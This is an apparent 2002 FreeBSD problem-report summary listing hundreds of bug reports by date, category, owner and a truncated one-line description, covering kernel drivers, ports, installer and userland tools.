[2002/07/04] bin/40209 __dtoa broken with -O2 or -O3 optimisatio o [2002/07/05] ports/40216 ports [xmh] xmh is unstable o [2002/07/05] ports/40218 ports [xmh] mail list does not refresh automati o [2002/07/05] bin/40219 [apm] apm breaks removable media o [2002/07/05] ports/40223 ports [xmh] Deleted mail does not appears in sc o [2002/07/05] kern/40225 ata driver incorrectly downgrades UDMA4 d o [2002/07/05] bin/40227 CVS client doesn't upload new files creat o [2002/07/05] ports/40232 ports xxgdb left button does not function prope o [2002/07/05] conf/40255 problem with installing and configuring X o [2002/07/05] ports/40258 dirk lyx fails to install o [2002/07/06] misc/40260 sysinstall hangs up detecting devices (No o [2002/07/06] bin/40261 sshd allows PasswordAuthentication even t o [2002/07/06] ports/40262 ports Update port: p5-Net-SSLeay to 0.17 o [2002/07/06] bin/40266 telnet SRA sometimes fails at authentific f [2002/07/06] i386/40274 "fxp: device timeout" errors during heavy o [2002/07/06] bin/40278 mktime returns -1 for certain dates/timez o [2002/07/07] bin/40282 /bin/kill has bad error checking for comm o [2002/07/07] bin/40314 mail is unable to parse From line w/o ema o [2002/07/07] ports/40317 ports transcode compilation problem s [2002/07/08] ports/40342 alane koffice-kde3 build nit, need cmath.h o [2002/07/08] ports/40349 ache [Update Port] graphics/png (to 1.2.4) o [2002/07/08] ports/40353 ports new ivtools release: ivtools-1.0.4 o [2002/07/08] misc/40359 Installation hanges after plip0 on ppbus0 o [2002/07/08] misc/40363 Syslogd crashes in function markit o [2002/07/09] ports/40375 knu ports/sysutils/portupgrade incorrectly se f [2002/07/09] bin/40382 compiling source root CVS o [2002/07/09] ports/40387 billf unable to 'make package' on net/ethereal o [2002/07/09] kern/40394 if_tap driver hard coded permission check o [2002/07/09] standards/40402standards/usr/include/stddef.h and /usr/include/st o [2002/07/10] ports/40428 ports KDE3 trashes Xresources data o [2002/07/10] i386/40432 Problema al instalar tarjeta video o [2002/07/10] ports/40434 gnome Screensaver not appearing in gnome Contro o [2002/07/10] ports/40441 ports sysutils/lcdproc + HD44780 + 'winamp' wir o [2002/07/11] bin/40448 [bmake bug] BSD make cannot find system m o [2002/07/11] bin/40466 pax may not handle correctly some tar arc o [2002/07/11] bin/40471 des chpass(1) -a option broken in CURRENT o [2002/07/12] ports/40484 ports REINPLACE_CMD doesn't understand \t o [2002/07/12] ports/40485 ports [patch] fix devel/jam REINPLACE problem o [2002/07/14] kern/40558 UDP6 sockets do not receive responses of o [2002/07/14] kern/40561 TTCP does not work with IPv6 o [2002/07/14] ports/40573 mbr OpenOffice sources mismatches MD5 checksu o [2002/07/14] kern/40574 NeoMagic soundcard detection on Gateway S o [2002/07/15] ports/40610 ports Latex build "cannot find Hyphenation patt o [2002/07/15] ports/40618 ports news/newsx: security patch for newsx vers o [2002/07/15] kern/40636 PCI devices don't share IRQs. o [2002/07/16] ports/40651 kuriyama [Patch Port] textproc/dsssl-docbook-modul o [2002/07/16] bin/40654 qa patch: sysinstall: infinite loop o [2002/07/16] bin/40655 qa patch: sysinstall assigns partition a to o [2002/07/16] bin/40656 qa patch: sysinstall: scripted deletion of s o [2002/07/16] ports/40672 ports wsoundserver defaults to using esound and o [2002/07/16] java/40677 java J2SDK 1.4.0.01 fails to do anything when o [2002/07/17] bin/40697 fsck[_ffs](8) doesn't ensure that (signed o [2002/07/18] kern/40740 4.6-RELEASE can't properly read some CD-R o [2002/07/18] ports/40757 jkh by cvsupfile defaults o [2002/07/18] ports/40759 anholt x11/XFree86-libraries build error: Wraphe o [2002/07/19] kern/40766 NEWCARD freeses system while card inserti o [2002/07/19] pending/40774gnats-admin o [2002/07/19] kern/40787 page fault while in kernel mode o [2002/07/19] kern/40792 signals lead to data loss on device ugen o [2002/07/20] misc/40802 adduser ignores password format o [2002/07/20] ports/40816 ports Port update for databases/sqlite o [2002/07/21] ports/40829 ports [Maintainer Update] www/php-templates o [2002/07/21] misc/40837 SMC EN5251BE ethernet chipset gets incorr o [2002/07/21] docs/40841 doc the PPP primer gives a very wrong ppp.con o [2002/07/21] conf/40842 ppp.conf examples directory is empty o [2002/07/21] ports/40844 ports Syntax error on german/BBBike/Makefile o [2002/07/21] ports/40857 ports autoconf port fails if shells/ksh93 is in o [2002/07/21] kern/40861 could not compile a new kernel o [2002/07/22] ports/40886 ache pkpkg_delete apache-1.3.26_3 does not w o [2002/07/22] kern/40895 wierd kernel / device driver bug o [2002/07/22] kern/40903 Busy_count is < 0 message keeps counting o [2002/07/23] ports/40923 perky www/apache2: static page delivery problem o [2002/07/23] misc/40941 robert syslogd "!prog" fails for progs with non- o [2002/07/23] kern/40944 linux compatability is broken o [2002/07/23] i386/40945 FreeBSD can not support IBM ServeRAID4Lx o [2002/07/25] i386/40972 Stallion Multiport Serial Driver . o [2002/07/25] ports/40973 ports Invalid behavior of emulators/rtc on -CUR o [2002/07/25] ports/40979 dirk mod_php security fix breaks PHP 4.2.2: va o [2002/07/25] i386/40997 XFree86 problem during install 4.6 o [2002/07/26] ports/41006 ports print/transfig doesn't compile on current o [2002/07/26] kern/41007 overfull traffic on third and fourth adap o [2002/07/26] i386/41020 Installation was successful only after I o [2002/07/27] conf/41054 Sendmail assumptions in startup scripts m o [2002/07/27] ports/41075 portmgr devel/gmake segfaults in non-default loca o [2002/07/28] ports/41085 ports palm/coldsync broken under FreeBSD 4.5 an o [2002/07/29] bin/41115 Syslogd stops sending messages to remote o [2002/07/29] kern/41125 squid-2.4.STABLE7 loop on poll() - SMP ke o [2002/07/29] ports/41128 ports recv_addr init wrong and 512 byte udp pac 1062 problems total. Non-critical problems S Submitted Tracker Resp. Description ------------------------------------------------------------------------------- f [1995/01/11] i386/105 Distributed libm (msun) has non-standard s [1995/09/26] kern/742 syslog errors accessing Mac hard disks [p s [1995/11/20] kern/831 one minor complaint about the kernel visu a [1996/01/30] bin/981 fenner clnt_broadcast() is not aware of aliases a [1996/07/07] bin/1375 eivind Extraneous warning from mv(1) [PATCH] s [1996/10/13] misc/1791 tegge syslimits.h does not allow overriding def f [1996/10/20] bin/1849 gdb sets library breakpoints on the wrong s [1996/11/22] bin/2090 clients may bind to FreeBSD ypserv refusi s [1996/12/02] bin/2137 tegge vm statistics are bad s [1996/12/14] bin/2216 [PATCH] Ada specs not being compiled into o [1996/12/24] kern/2273 dufault support for POSIX.4 / POSIX.1a RT-schedul s [1996/12/27] kern/2298 Support for DSR/DCD swapping on serial po a [1996/12/27] misc/2302 brandon new crypt() including SHS and an extendab o [1997/01/10] bin/2442 davidn setusershell()/endusershell() missing o [1997/01/28] bin/2603 dufault Added POSIX.4/POSIX.1b constants in unist a [1997/02/02] bin/2641 wpaul login_access.c doesn't work with NIS by d s [1997/02/15] misc/2745 fenner PR querry web form doesn't sort correctly o [1997/03/10] bin/2934 cracauer sh(1) has problems with $ENV s [1997/03/10] bin/2938 hoek Add -b, -l, and -f options to du(1) o [1997/04/14] bin/3284 mikeh [PATCH] symorder(1): -t option doesn´t wo p [1997/05/08] gnu/3552 the -L option of tar does not work proper f [1997/05/16] bin/3608 jkoshy Telnet in linemode will break apart long o [1997/06/02] bin/3762 dufault Bogus return values from rtprio(1) f [1997/06/10] bin/3837 dufault new feature for rtprio o [1997/06/24] kern/3944 paul if_le doesnt receive ether multicast pack o [1997/06/25] kern/3948 jlemon nonworking t/tcp server side o [1997/07/18] bin/4116 davidn Kerberized login as .root fails to s [1997/07/26] bin/4172 des suggest reconnection option added to fetc s [1997/07/28] kern/4184 [PATCH] minor nits in sys/netatalk o [1997/08/08] misc/4249 wpaul ypchsh doesn't care about changing a user o [1997/08/13] kern/4297 dufault SIGEV_NONE and SIGEV_SIGNAL go in signal. o [1997/08/13] i386/4300 msmith The initial timeout on open("/dev/lpt0".. o [1997/08/14] ports/4304 portmgr Recommendation re. Ports Collection o [1997/08/29] kern/4413 No way to unmount a floppy that goes bad o [1997/08/29] bin/4419 man can display the same man page twice o [1997/08/29] bin/4420 roberto find -exedir doesn't chdir for first entr o [1997/09/03] bin/4459 bde No prototype for moncontrol(3) and monsta o [1997/09/25] bin/4629 calendar doesn't print all dates sometime o [1997/09/28] misc/4646 qa Can't fixit with an NFS-mounted CD. o [1997/10/05] bin/4696 ping hangs on certain unresolvable hosts o [1997/10/15] gnu/4771 diff to correct misleading total bytes in o [1997/10/24] kern/4845 Boot complains about disk slices in FAT p o [1997/11/13] bin/5031 gad lpr does not remove original file if -s i s [1997/11/28] bin/5173 [PATCH] restore ought to deal with root s s [1997/11/30] i386/5182 bde [PATCH] A patch support high speed serial s [1997/12/14] bin/5296 slattach fails creating pidfile with ioct o [1997/12/22] kern/5362 peter mount incorrectly reports / as an NFS exp s [1998/01/03] bin/5419 [PATCH] timed rejects valid networks with o [1998/01/11] bin/5483 Login(1) clears utmp entry s [1998/01/20] kern/5532 [PATCH] Dropped packet counts are inaccur o [1998/01/26] kern/5577 bde Unnecessary disk I/O and noatime ffs fixe a [1998/01/28] bin/5591 jkoshy Trouble with LD_PRELOAD environment varia o [1998/01/31] bin/5609 gad lpd cannot send long files to HP's JetDir o [1998/02/09] kern/5689 phk sysctl vm.vmmeter - bogus and unsupported o [1998/02/10] bin/5712 mikeh /bin/chio code cleaup and option added o [1998/02/14] bin/5745 nik [PATCH] Add /usr/local/share/mk to defaul o [1998/02/26] kern/5863 Kernel support for sorted SHUTDOWN & SHUT a [1998/03/06] i386/5932 perfmon kernel code should check for non- f [1998/03/28] bin/6161 assar 2.2.6 kerberos servers are awfully visibl p [1998/03/31] bin/6183 iedowse quota hangups p [1998/03/31] kern/6184 No error if resulting file pos in lseek i a [1998/04/16] misc/6320 mike Sometimes nohup isn't good enough. o [1998/04/17] gnu/6338 Gnu tar not working properly with the -G o [1998/04/18] conf/6346 joe Kernel version strings need to relate to o [1998/05/12] misc/6612 bsd.man.mk can't handle man pages with ": o [1998/05/13] conf/6624 davidn One class with nologin=/etc/nologin: reje s [1998/05/17] kern/6668 babkin [PATCH] new driver: Virtual Ethernet driv s [1998/05/29] bin/6785 place for all the default dump flags s [1998/06/01] kern/6820 jesper cd9660_mount NULL pointer deref for no CD o [1998/06/22] ports/7023 portmgr bsd.port.(%|subdir.).mk patches for size s [1998/06/28] i386/7100 hm integrate pcvt configuration into the /et a [1998/07/01] bin/7136 kerberized telnetd doesn't use gettytab % s [1998/07/10] misc/7232 qa Suggestion for FreeBSD installation dialo o [1998/07/10] kern/7234 yokota keyboard problems during login immediatel o [1998/07/12] bin/7265 A warning flag is added to ln(1). f [1998/07/15] bin/7287 Incorrect domain name for MAP_UPDATE in m a [1998/07/19] bin/7324 Suggestions for minor modifications to ad s [1998/08/13] conf/7606 [PATCH] NIS Makefile.dist: NOPUSH replace s [1998/08/18] bin/7669 libalias does not IRC DCC packets under c o [1998/08/19] gnu/7687 description of default baud rate for cu c s [1998/08/22] kern/7722 Changes to acct format p [1998/09/03] bin/7828 johan Add a command line option to cp to make i s [1998/09/08] bin/7868 [almost patch]Morse Code Fixups o [1998/09/16] misc/7946 asami ccdconfig gives confusing error when give o [1998/09/18] bin/7973 gad lpd: Bad control file owner in case of re s [1998/09/21] kern/8015 nbm [patch] Some sysctl descriptions for the o [1998/09/27] ports/8063 portmgr [PATCH] Add multiple CDROM support to bsd o [1998/10/03] misc/8133 markm [patch] bug in telnetd (Kerberos IV) o [1998/10/19] kern/8376 CLOCK_VIRTUAL not implemented o [1998/10/27] i386/8474 repquota does not pick up NIS information a [1998/10/28] bin/8479 dd Final \'s in /etc/exports did not work in f [1998/10/30] kern/8498 dwmalone Race condition between unp_gc() and accep f [1998/11/03] bin/8553 gshapiro /usr/libexec/mail.local doesn't handle "> o [1998/11/27] i386/8867 qa /stand/sysinstall core dumps (signal 11) o [1998/12/16] ports/9107 portmgr Addition to bsd.port.mk for searching mul a [1998/12/18] bin/9123 kris pax can't read tar archives that contain f [1998/12/28] misc/9220 ache nvi: catalog: mistake in Russian error me o [1998/12/29] bin/9233 gmp's mpq_add and mpq_sub are buggy a [1999/01/05] bin/9333 jkoshy timestamp dump's progress o [1999/01/19] kern/9570 dfr ed(4) irq config enhancement o [1999/01/22] kern/9619 Restarting mountd kills existing mounts f [1999/01/25] kern/9679 fix for uninterruptible open in portal fi a [1999/01/28] bin/9770 kris An openpty(3) auxiliary program o [1999/01/29] i386/9777 cg Generic AD1816 sound suport in Luigi's pc o [1999/01/31] ports/9840 portmgr patch allows ports to fetch their sources o [1999/02/01] bin/9868 Patch to add "date -a" o [1999/02/01] kern/9869 When using macros out of function, they s o [1999/02/01] conf/9874 idle-timeout facilities in /etc/login.con o [1999/02/09] i386/9991 new driver for National Instruments GPIB o [1999/02/11] bin/10030 markm Kerberized telnet fails to encrypt when a o [1999/02/25] docs/10240 wosch We need a script which check if our web m f [1999/02/26] bin/10283 Race condition in rc.network o [1999/03/02] bin/10358 yar ftp(1) has problems with long pathnames f [1999/03/07] i386/10465 mdodd Must disable ex0 to install. f [1999/03/15] kern/10609 adjtime bug (tv_sec > 2147) and enhanceme o [1999/03/15] bin/10611 timed enhancement o [1999/03/17] kern/10641 groudier Default sync rate in ncr SCSI driver is s o [1999/03/19] gnu/10670 peter cvs doesn't allow digits in local keyword o [1999/03/19] kern/10673 wpaul Non-ASCII chars on serial console with Re o [1999/03/19] ports/10682 portmgr List mirror sites in MASTER_SITE_BACKUP - p [1999/04/03] bin/10931 johan biff b o [1999/04/08] kern/11020 popen does not honor ISO 9899 syntax o [1999/04/08] bin/11036 markm Perl does not honor -DNOMAN o [1999/04/11] bin/11085 Per-host configuration for syslog.conf a [1999/04/11] bin/11092 johan readlink(1) from OpenBSD f [1999/04/13] bin/11114 standardsmake(1) does not work as documented with o [1999/04/14] ports/11134 hoek existense of /usr/obj/usr/ports/shells/ba o [1999/04/16] i386/11165 IBCS2 don't work correctly with PID_MAX 9 a [1999/04/16] bin/11168 davidn pw(8) usermod does not recognize -w flag f [1999/04/20] bin/11236 mountd fails to properly check for kernel f [1999/04/20] bin/11248 Shuffle o [1999/04/23] kern/11293 brian FreeBSD's PPP implementation of LQM appea o [1999/04/23] bin/11294 direct logging to other hosts (no local s o [1999/05/06] misc/11553 /usr/share/misc/latin1 (new file submissi o [1999/05/19] kern/11789 obrien ELF machine definition missing for ARM f [1999/05/29] bin/11929 symorder doesn't work on elf format objec o [1999/06/03] kern/12014 alfred Fix SysV Semaphore handling o [1999/06/06] gnu/12046 markm Perl subsystem does not install all tutor o [1999/06/07] kern/12071 [PATCH] large scale IP aliasing o [1999/06/08] i386/12088 Enhancement to ed driver for Linksys 10/1 o [1999/06/16] bin/12244 realpath() fails when there is no permiss o [1999/06/18] bin/12280 jdp LD_IGNORE_MISSING_OBJECTS not honored for o [1999/06/21] conf/12324 qa Sysinstall's fdisk partition editor is mi o [1999/06/21] ports/12325 portmgr Adds refetch functionallity to bsd.port.m s [1999/06/23] bin/12358 ken Patch: "camcontrol help" should go to std o [1999/06/26] bin/12398 fsck in free(): warning: pointer to wrong o [1999/07/06] kern/12543 dg [PATCH] cumulative error counters for fxp o [1999/07/07] bin/12545 peter kldload(8) should be more sensitive to er o [1999/07/08] ports/12566 billf a guide to pyrotechnics o [1999/07/25] bin/12801 nvi infinite recursion with options "left o [1999/08/03] bin/12939 add flag to quota to suppress NFS quota c o [1999/08/04] ports/12952 portmgr make _PORT_USE touch cookies by variable, f [1999/08/04] kern/12966 silby receiver lockups in vr0 driver f [1999/08/05] i386/12993 gibbs "ahc0: Data Parity Error Detected during o [1999/08/09] bin/13042 make doesn't handle wildcards in subdirec o [1999/08/09] bin/13043 minigzip -c option support. o [1999/08/11] bin/13068 billf Don't stamp out score files! o [1999/08/12] bin/13108 authunix_create_default includes egid twi a [1999/08/13] bin/13128 cy pkg_delete doesn't handle absolute pathna f [1999/08/18] kern/13232 panic("rtfree"); when sending bootp reque o [1999/08/21] bin/13309 billf Fixes to nos-tun o [1999/08/22] misc/13326 additional timeval interfaces for ' cannot be used in "via" o [2000/05/30] kern/18909 dwmalone select(2) timeout limited to 100000000 se o [2000/06/01] ports/18960 portmgr Add USE_APACHE to bsd.port.mk for Apache o [2000/06/01] bin/18961 green sshd does not print before motd o [2000/06/03] bin/18992 brian log packets blocked by filter rules o [2000/06/03] misc/18997 markm Kerberos5 CFLAGS needed f [2000/06/04] conf/19001 Delayed fsck + mount of insignificant fil o [2000/06/06] ports/19051 asami New target for bsd.port.mk : fetchdepends f [2000/06/06] bin/19057 offer of patch to uname that produces pre o [2000/06/07] ports/19112 portmgr files with names something,v in patches d o [2000/06/09] kern/19156 jkh Enable the doFS.sh to run in arbitrary lo o [2000/06/11] kern/19213 SC_DFLT_FONT compile option breaks kernel f [2000/06/13] conf/19236 sanpei not-existing PCMCI cards in pccard.conf.s o [2000/06/13] misc/19246 portmgr Poor error message when fetching files wi o [2000/06/13] ports/19253 dirk mod_php4 has pkg dependency when not usin o [2000/06/14] ports/19270 portmgr Ports build mechanism doesn't check wheth o [2000/06/15] gnu/19327 Fix to build 'a.out' binary. o [2000/06/19] misc/19391 emulationEvilness with Linux Terminus, causes X to o [2000/06/20] misc/19406 setenv() allocates memory which is not fr o [2000/06/22] ports/19448 markm filename input broken o [2000/06/23] misc/19467 green OpenSSH (as an rsync tunnel) blocks forev o [2000/06/24] kern/19490 faith0 network device has high number of o [2000/06/26] kern/19535 adrian procfs_rlimit tidyup s [2000/06/28] conf/19573 des Dot Files for Optional Shells o [2000/06/29] ports/19591 ports ssh2 port ignores 'ignorenologin' from lo o [2000/06/30] ports/19594 trevor update port: qrash o [2000/07/01] bin/19635 add -c for grand total to df(1), like du( o [2000/07/02] gnu/19642 kbyanc patch to merge OpenBSD changes to patch(1 o [2000/07/02] ports/19650 asami python package causes segmentation fault o [2000/07/03] bin/19683 green mount displays incorrect mount point on f a [2000/07/03] kern/19686 yokota splash screen fails o [2000/07/05] kern/19720 kbyanc more sysctl signed-ness patches o [2000/07/07] kern/19756 Inability to use linux extended partition o [2000/07/07] bin/19772 df output wrong for union-mounts o [2000/07/08] kern/19782 dirk mkisofs 1.12.1 (i386-unknown-freebsd4.0) f [2000/07/09] misc/19798 cg 4DWAVE doesn't work. o [2000/07/10] kern/19827 yokota psm flag bit9(NOIDPROBE) doesn't work cor o [2000/07/10] misc/19837 ambrisko Run Fit it floppy from serial port o [2000/07/12] ports/19868 portmgr modify ports/Mk/bsd.port.mk to remove ALL o [2000/07/12] kern/19871 alfred select on named pipes always returns 'ava o [2000/07/14] kern/19913 des add SYN+FIN counter o [2000/07/15] kern/19966 new syscons screensaver o [2000/07/18] gnu/20004 FBSD4 gcc __attribute__(constructor) not o [2000/07/19] bin/20042 "rsh -t" doesn't timeout if rcmd(3) never o [2000/07/20] bin/20054 ftpd: rotating _PATH_FTPDSTATFILE losts x o [2000/07/24] misc/20139 msmith Simple typo in src/share/examples/ppi/ppi o [2000/07/24] misc/20159 strftime() can't produce ISO8601 format t o [2000/07/24] misc/20166 billf Corrections & additions to games/quiz/dat o [2000/07/26] bin/20204 ps more doesn't handle 8-bit characters prop o [2000/07/27] kern/20214 dec kernel routing bug for nexthop is routed o [2000/07/28] ports/20270 reg libtool needlessly runs ldconfig after in o [2000/07/29] kern/20297 cg Joystick is not enabled with es1370 based o [2000/07/31] misc/20326 marcel [PATCH] installkernel fails if DESTDIR is o [2000/07/31] misc/20333 ftp login fails on unix password when s/k o [2000/08/01] kern/20352 yokota Configuring a synaptics touchpad o [2000/08/02] ports/20359 demon New port: Apache-mod_perl_guide f [2000/08/02] bin/20371 murray dhclient inserts bogus configurations o [2000/08/03] kern/20384 n_hibma Phase errors with Zip650 CD on USB o [2000/08/03] kern/20389 ken "device pass" required for CD ripping o [2000/08/03] bin/20391 jhb sysinstall should check debug.boothowto s o [2000/08/04] kern/20410 sio support for high speed NS16550A, ST16 o [2000/08/05] conf/20436 Can't make only cd0 under 4.1-STABLE o [2000/08/07] misc/20457 davidn pw command doesn't generate random passwo o [2000/08/09] bin/20501 mjacob extra flag to dump to offline autoloaders a [2000/08/10] ports/20520 olgeni New port: lang/mercury o [2000/08/10] docs/20528 doc sysconf(3) manpage doesn't mention posix. o [2000/08/10] kern/20529 wpaul gigabit cards fail to link o [2000/08/11] i386/20537 msmith HP NetRAID controller error when rebootin a [2000/08/14] ports/20610 patrick New port of cgoban2 o [2000/08/15] bin/20613 des fetch -T n is not timeout correctly when o [2000/08/16] i386/20660 wpaul if_wi provides 802.11 src and dst, not et o [2000/08/17] ports/20678 portmgr make SORTED_MASTER_SITES_CMD variable ove o [2000/08/21] bin/20742 ps Weird problem with 'more' on 4-1-STABLE o [2000/08/23] ports/20795 msmith FBSD 4.x: Citrix client with drive mappin o [2000/08/23] bin/20799 davidn top's problem o [2000/08/23] i386/20803 mdodd ep0 driver finds additional "shadow" ep c o [2000/08/23] kern/20804 deadlocking when using vnode disk file an o [2000/08/24] bin/20824 ftpd returns, "ad0s1a: not a plain file." o [2000/08/24] misc/20830 lile kernel link problems with Olicom token ri f [2000/08/25] i386/20845 Cyclades cy driver incompatible with Cycl o [2000/08/26] kern/20878 wpaul Patch to add support for the 3c556B MiniP o [2000/08/26] bin/20881 kris There's no reason not to build DNSsec-DSA o [2000/08/27] bin/20889 dwmalone syslogd.c still uses depreciated domain A o [2000/08/28] bin/20908 qa /stand/sysinstall too limited in selectio o [2000/08/29] misc/20920 yokota window(1) interferes with screensaver o [2000/08/29] kern/20927 ume dmesg output: looutput: mbuf allocation f o [2000/08/30] bin/20944 ru natd enhancements, default config file an o [2000/09/02] bin/20996 kris permissions on /usr/bin/opiepasswd o [2000/09/02] bin/21008 gad Fix for lpr's handling of lots of jobs in o [2000/09/04] bin/21024 pow() ERANGE bug o [2000/09/05] conf/21059 marcel `make -jN buildkernel' can't keep source o [2000/09/05] conf/21066 Proposed change in rc scripts o [2000/09/05] misc/21070 marcel default setting of ${SUP} in Makefile.inc o [2000/09/06] bin/21074 davidn chkgrp vs group(5) inconsistency f [2000/09/06] bin/21075 dwmalone top: can't allocate sufficient memory o [2000/09/06] bin/21080 mjacob dump doesn't use eject tape device correc o [2000/09/09] kern/21156 yokota [PATCH] inconsistency in scmouse vs xterm s [2000/09/10] bin/21178 ken voltag selector, and unload support for c o [2000/09/12] kern/21222 dillon wrong behavior of concurrent mmap()s on N o [2000/09/12] kern/21229 Proper value for vfs.nfs.access_cache_tim o [2000/09/16] bin/21312 more incorrectly redraws screen on xterm o [2000/09/16] bin/21315 Shells often behave oddly when executing p [2000/09/22] misc/21494 yar ftpd can't handle /etc/chroot entries wit o [2000/09/24] bin/21519 sys/dir.h should be deprecated some more o [2000/09/24] bin/21531 mp csh/tcsh provide no way to see/adjust new f [2000/09/26] bin/21570 dougb [PATCH] Add -r option to /usr/bin/mail, q o [2000/09/28] ports/21621 portmgr Update port: devel/libtool to 1.3.5 f [2000/09/28] kern/21623 wpaul Chipset SiS630E / NIC SiS 900 o [2000/09/29] misc/21644 /usr/include/sys/mman.h uses a type defin s [2000/09/30] bin/21659 Berkeley db library is statically compile o [2000/10/01] i386/21672 obrien AMD Duron Rev. A0 reports incorrect L2 ca o [2000/10/01] misc/21675 Better and more disktab entries for MO dr o [2000/10/02] conf/21695 ifconfig_XXX_aliasY in rc.conf; Y must be o [2000/10/02] misc/21715 The freebsd mail list digifier loses MIME o [2000/10/04] bin/21751 ken libcam's cam_real_open_device() may lose o [2000/10/04] kern/21754 n_hibma Sound stops working when NetGear USB Devi o [2000/10/05] bin/21766 [PATCH] add -s (skip) flag to head(1) o [2000/10/05] kern/21768 rwatson shouldn't trailing '/' on regular file sy o [2000/10/06] bin/21806 lock(1) currently defaults to 15 minute t a [2000/10/06] kern/21807 [patches] Make System attribute correspon o [2000/10/07] docs/21826 wollman ARP proxy feature lacks documentation o [2000/10/09] kern/21859 Allow the syncer to be slowed down o [2000/10/09] ports/21885 portmgr bsd.port.mk: test for old layout is too o [2000/10/10] ports/21903 portmgr bsd.ports.mk - automake/aclocal adds o [2000/10/14] conf/21994 Config of Anonftp (at install) always cre p [2000/10/14] gnu/21996 use of -s and -C causes tar to dump core o [2000/10/16] bin/22033 [PATCH] to pw(8) to allow encrypted passw o [2000/10/16] bin/22034 nfsstat lacks useful features found in So o [2000/10/17] kern/22065 luigi Patch to add support to ipfw for per rule o [2000/10/18] misc/22073 xonsole: couldn't open console o [2000/10/18] conf/22102 Local scripts get run before securelevel o [2000/10/20] ports/22149 portmgr Enhance the "Old port layout" message fro o [2000/10/21] bin/22182 vi options noprint/print/octal broken o [2000/10/21] misc/22190 A threaded read(2) from a socketpair(2) f o [2000/10/21] bin/22198 inet_ntop may set errno to ENOSPC and nee o [2000/10/26] conf/22308 mounting NFS during boot blocks if host m o [2000/10/26] misc/22332 request to add vtys to /etc/ttys s [2000/10/27] bin/22351 green sed(1) fails with backslash on buffer bou o [2000/10/29] ports/22399 msmith PIB 1.2 still looks for MD5 info in files o [2000/10/30] ports/22412 taoka two extraneous ports and one name change o [2000/10/31] bin/22442 greid [PATCH] Increase speed of split(1) o [2000/11/02] ports/22550 cy Patch for conserver for log file rotation o [2000/11/04] kern/22602 CDRoms checked during shutdown (umount) o [2000/11/04] bin/22612 schweikh crontab -e failures o [2000/11/06] conf/22645 Cannot override "ignore" in /etc/mail.rc o [2000/11/07] misc/22660 termcap kterm entry tc=xterm is wrong a [2000/11/08] misc/22696 luigi picobsd build with router configuration c o [2000/11/08] ports/22698 portmgr Ports' rc.d files should use rc.conf o [2000/11/09] bin/22730 fenner tcpslice doesn't handle long file offsets o [2000/11/14] bin/22860 yar [PATCH] adduser & friends with '$' in use o [2000/11/14] docs/22861 dd newsyslog man page is misleading and inco o [2000/11/15] kern/22868 getsockname may return an incorrect addre o [2000/11/15] misc/22873 markm Perl's core'h conflicts with ncurses.h o [2000/11/16] i386/22900 patch: Adds Brand ID support to src/sys/i o [2000/11/17] misc/22914 bootinst messages are not updated s [2000/11/17] conf/22916 green Ssh/sshd binaries lacks kerberos support o [2000/11/17] bin/22933 green Typographical error in ssh.1 f [2000/11/20] ports/22995 grog Update port: x11-servers/x2x (fix ports/2 o [2000/11/23] conf/23063 ru [PATCH] for static ARP tables in rc.netwo o [2000/11/24] bin/23082 dwmalone ntpd has only one reference-clock parser o [2000/11/25] bin/23097 Enhance WEP some more including ability t o [2000/11/27] misc/23148 getopt(3) works non-intuitively? o [2000/11/29] bin/23178 'talk' not doing right thing o [2000/11/29] bin/23180 Certain KOI8 characters are treated as "w o [2000/12/01] bin/23204 length of salt in crypt() is not the same o [2000/12/02] bin/23233 kris Reincorporate /usr/bin/error in the FreeB a [2000/12/03] bin/23254 fenner yacc accepts bad grammer o [2000/12/05] kern/23304 standardsPOSIX clock_gettime, clock_getres return f [2000/12/05] kern/23314 aic driver fails to detect Adaptec 1520B f [2000/12/07] misc/23362 fenner tcpdump wrong on sppp CISCO_HDLC encoded o [2000/12/07] misc/23366 mmap() non conforming o [2000/12/07] gnu/23367 some src/gnu Makefiles are missing $FreeB a [2000/12/09] conf/23402 qa sysinstall upgrade ought to check partiti p [2000/12/11] bin/23472 mp gdb weirdness on programs compiled with - o [2000/12/13] kern/23520 sb0 old style audio support in 4.2-RELEAS o [2000/12/13] misc/23539 marcel make installworld from nfs mounted /usr/s o [2000/12/14] kern/23546 tanimura [PATCH] csa DMA-interrupt problem o [2000/12/14] ports/23560 portmgr linux-jdk/Makefile assumes default `patch o [2000/12/15] i386/23562 telnetd doesn't show message in file spec o [2000/12/15] ports/23581 portmgr Updates to bsd.port.mk to detect changing o [2000/12/17] gnu/23598 Merge libgcc_r with libgcc o [2000/12/17] ports/23602 portmgr Recursive distclean for bsd.port.mk w/pat o [2000/12/18] bin/23635 mike [PATCH] whois enhancement - smarter whois o [2000/12/24] kern/23814 .au sound files < 528 bytes actual data d o [2000/12/24] ports/23822 trevor mtree entries for German X11 man pages a [2000/12/28] bin/23912 sheldonh underflow of cnt in vs_paint() by O_NUMBE o [2000/12/29] bin/23944 Patch for ftpd to add a cd after the chro o [2001/01/04] bin/24066 mp gdb can't detach from programs linked wit o [2001/01/06] ports/24120 portmgr "/usr/ports/Mk/bsd.port.mk", line 626: In p [2001/01/07] misc/24132 mp gdb output is wrong (same as #13427 ?) o [2001/01/07] kern/24141 sound emu10k1 has trouble playing non-44.1KHz s o [2001/01/10] ports/24214 portmgr [PATCH] verbose 'make index' o [2001/01/11] ports/24259 steve port of open-motif on make install compla o [2001/01/12] ports/24292 portmgr update-patches target in ports/Mk/bsd.por o [2001/01/12] ports/24299 ports Configure the synaptics touchpad. o [2001/01/15] ports/24361 portmgr wrong filemodes o [2001/01/16] misc/24384 4.1 Cant add entry to neighbour discovery o [2001/01/16] bin/24390 Replacing old dir-symlinks when using /bi o [2001/01/16] kern/24393 Patch to msdosfs to handle a kind of inco o [2001/01/18] bin/24435 Changing slice type causes Auto-partition o [2001/01/20] bin/24485 [PATCH] to make cron(8) handle clock jump o [2001/01/20] ports/24493 msmith Pib maker function unable to launch xterm a [2001/01/21] kern/24512 jesper Sent ICMP unreach when packet not for us o [2001/01/21] misc/24513 peter new options for pppd o [2001/01/21] conf/24515 Fix for find(1) warning in /etc/rc o [2001/01/21] bin/24521 green ssh-agent exits when authenticating DSA v o [2001/01/22] kern/24528 Bad tracking of Modem status o [2001/01/23] bin/24592 cjc dmesg.boot Gets Overwritten without Reboo o [2001/01/25] ports/24651 mharo portlint gives a bogus warning o [2001/01/26] ports/24658 jkh Enhancement to src/release/Makefile o [2001/01/26] alpha/24663 alpha Console output gets scribbled into /var/l o [2001/01/27] gnu/24681 gcc 2.95.3 cannot compile rince.c from IO o [2001/01/27] ports/24687 ports QUAKE FORGE & SVGALIB o [2001/01/30] ports/24736 trevor New port: SGI's open inventor (graphics/i o [2001/01/30] bin/24742 send 